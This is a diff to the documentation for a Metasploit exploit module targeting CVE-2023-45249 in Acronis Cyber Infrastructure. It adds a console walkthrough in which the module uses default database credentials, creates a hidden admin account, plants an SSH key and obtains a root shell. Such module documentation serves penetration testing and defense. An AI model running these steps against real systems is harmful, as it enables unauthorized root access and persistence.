@@ -53,14 +53,12 @@ This option is required and is PostgreSQL database port (default: 5432) to conne
53
53
### SSHPORT
54
54
This option is required and is the SSH port (default: 22) to establish a SSH session.
55
55
56
- ### PRIV_KEY
57
- This option is optional and allows the use of your own SSH private key.
56
+ ### PRIV_KEY_FILE
57
+ This option is optional and allows the use of your own SSH private key file in PEM format.
58
+ Generate your SSH private key with following command ` ssh-keygen -t rsa -b 2048 -m PEM -f <your_priv_key> ` or
59
+ convert your existing SSH private key to PEM format with ` ssh-keygen -p -N "" -m PEM -f /path/to/existing/private/key `
58
60
If no key is provided, a private SSH key will be generated.
59
61
60
- ### PUB_KEY
61
- This option is optional and allows the use of your own SSH public key.
62
- If no key is provided, a public SSH key will be generated.
63
-
64
62
## Scenarios
65
63
``` msf
66
64
msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > info
@@ -98,22 +96,21 @@ Check supported:
98
96
Yes
99
97
100
98
Basic options:
101
- Name Current Setting Required Description
102
- ---- --------------- -------- -----------
103
- DATABASE keystone yes The database to authenticate against
104
- DBPORT 6432 yes PostgreSQL DB port
105
- PASSWORD vstoradmin no The password for the specified username. Leave blank for a random password.
106
- PRIV_KEY no SSH Private Key
107
- PUB_KEY no SSH Public Key
108
- Proxies no A proxy chain of format type:host:port[,type:host:port][...]
109
- RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basi
110
- cs/using-metasploit.html
111
- RPORT 8888 yes The target port (TCP)
112
- SSHPORT 22 yes SSH port
113
- SSL true no Negotiate SSL/TLS for outgoing connections
114
- TARGETURI / yes Path to the Acronis Cyber Infra application
115
- USERNAME vstoradmin yes The username to authenticate as
116
- VHOST no HTTP server virtual host
99
+ Name Current Setting Required Description
100
+ ---- --------------- -------- -----------
101
+ DATABASE keystone yes The database to authenticate against
102
+ DBPORT 6432 yes PostgreSQL DB port
103
+ PASSWORD vstoradmin no The password for the specified username. Leave blank for a random password.
104
+ PRIV_KEY_FILE no SSH private key file in PEM format (ssh-keygen -t rsa -b 2048 -m PEM -f <priv_key_file>)
105
+ Proxies no A proxy chain of format type:host:port[,type:host:port][...]
106
+ RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-me
107
+ tasploit.html
108
+ RPORT 8888 yes The target port (TCP)
109
+ SSHPORT 22 yes SSH port
110
+ SSL true no Negotiate SSL/TLS for outgoing connections
111
+ TARGETURI / yes Path to the Acronis Cyber Infra application
112
+ USERNAME vstoradmin yes The username to authenticate as
113
+ VHOST no HTTP server virtual host
117
114
118
115
Payload information:
119
116
@@ -135,7 +132,7 @@ References:
135
132
https://security-advisory.acronis.com/advisories/SEC-6452
136
133
https://attackerkb.com/topics/T2b62daDsL/cve-2023-45249
137
134
138
- View the full module info with the info -d command
135
+ View the full module info with the info -d command.
139
136
```
140
137
## Scenarios
141
138
### Acronis Cyber Infrastructure 4.7 appliance Unix/Linux command
@@ -190,6 +187,59 @@ uid=0(root) gid=0(root) groups=0(root)
190
187
uname -a
191
188
Linux aci-471-53.vstoragedomain 3.10.0-1160.41.1.vz7.183.5 #1 SMP Thu Sep 23 18:26:47 MSK 2021 x86_64 x86_64 x86_64 GNU/Linux
192
189
```
190
+ ### Acronis Cyber Infrastructure 4.7 appliance Interactive SSH using your own SSH private key file in PEM format
191
+ ``` msf
192
+ msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > ssh-keygen -t rsa -b 2048 -m PEM -f /tmp/aci_rsa
193
+ [*] exec: ssh-keygen -t rsa -b 2048 -m PEM -f /tmp/aci_rsa
194
+
195
+ Generating public/private rsa key pair.
196
+ Enter passphrase (empty for no passphrase):
197
+ Enter same passphrase again:
198
+ Your identification has been saved in /tmp/aci_rsa
199
+ Your public key has been saved in /tmp/aci_rsa.pub
200
+ The key fingerprint is:
201
+ SHA256:H1Ewu7NLZdYIV4SQZPhsaGkXb/IG9fQgZEjqfKBRTIg root@cerberus
202
+ The key's randomart image is:
203
+ +---[RSA 2048]----+
204
+ | . +o+B*+oo |
205
+ | E ..oo+=+.o |
206
+ | . o=++.+ o |
207
+ | ==.B=oo. .|
208
+ | .oSo=== . |
209
+ | o Bo |
210
+ | +. |
211
+ | . . |
212
+ | . |
213
+ +----[SHA256]-----+
214
+ msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > set target 1
215
+ target => 1
216
+ msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > set PRIV_KEY_FILE /tmp/aci_rsa
217
+ PRIV_KEY_FILE => /tmp/aci_rsa
218
+ msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > set rhosts 192.168.201.5
219
+ rhosts => 192.168.201.5
220
+ msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > exploit
221
+
222
+ [*] Running automatic check ("set AutoCheck false" to disable)
223
+ [+] The target appears to be vulnerable. Version 4.7.1-53
224
+ [*] Creating admin user gzarzyh with password XiloxPsdto for access at the Acronis Admin Portal.
225
+ [*] Saving admin credentials at the msf database.
226
+ [*] Using your own SSH private key file: /tmp/aci_rsa in PEM format.
227
+ [*] Saving SSH public and private key pair at the msf database.
228
+ [*] Uploading SSH public key at the Acronis Admin Portal.
229
+ [*] Authenticating with SSH private key.
230
+ [*] Executing Interactive SSH for generic/ssh/interact
231
+ [*] SSH session 1 opened (192.168.201.8:40083 -> 192.168.201.5:22) at 2024-09-20 09:40:22 +0000
232
+
233
+ id
234
+ uid=0(root) gid=0(root) groups=0(root)
235
+ uname -a
236
+ Linux aci-471-53.vstoragedomain 3.10.0-1160.41.1.vz7.183.5 #1 SMP Thu Sep 23 18:26:47 MSK 2021 x86_64 x86_64 x86_64 GNU/Linux
237
+ ls -l .ssh
238
+ total 4
239
+ -rw------- 1 root root 872 Sep 20 11:40 authorized_keys
240
+ cat .ssh/authorized_keys
241
+ ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCauf4JO4xGHWulsoHHOwTXztTvJ4FQz92RTicFIqqHOPvR3vsXkWYJP4vE109/ZnUh64jsMqMb+x66q3+D86rts/ST4smpMjQpL2uwfrn3KHKwVmH7vMYb07q4F8M2nw4TgzYcsXONqAyxmbW0ZJ3P3CdlXXiXMvyUmy55OyVgaBnjoiE1GJxXnssCqPMkf0MaZfZqaaBk3onaKnJ4pRROHe1LEaagSM7dOHjS1F6ViVUYtcfFLQfXj4Q7WsWS5uSUy6HkxDn5PNvzUli7SDJ5aPTDqmmeDjzoVlUl7ZP4CYZlrTpZ1v0C0IuI3qlZmuHPuGaCDN7ymPsRUV71aqv3 root VSTOR-KEY-ID:1966f610-e22a-4147-bec3-4cfb945bdee7
242
+ ```
193
243
194
244
## Limitations
195
245
No limitations.
0 commit comments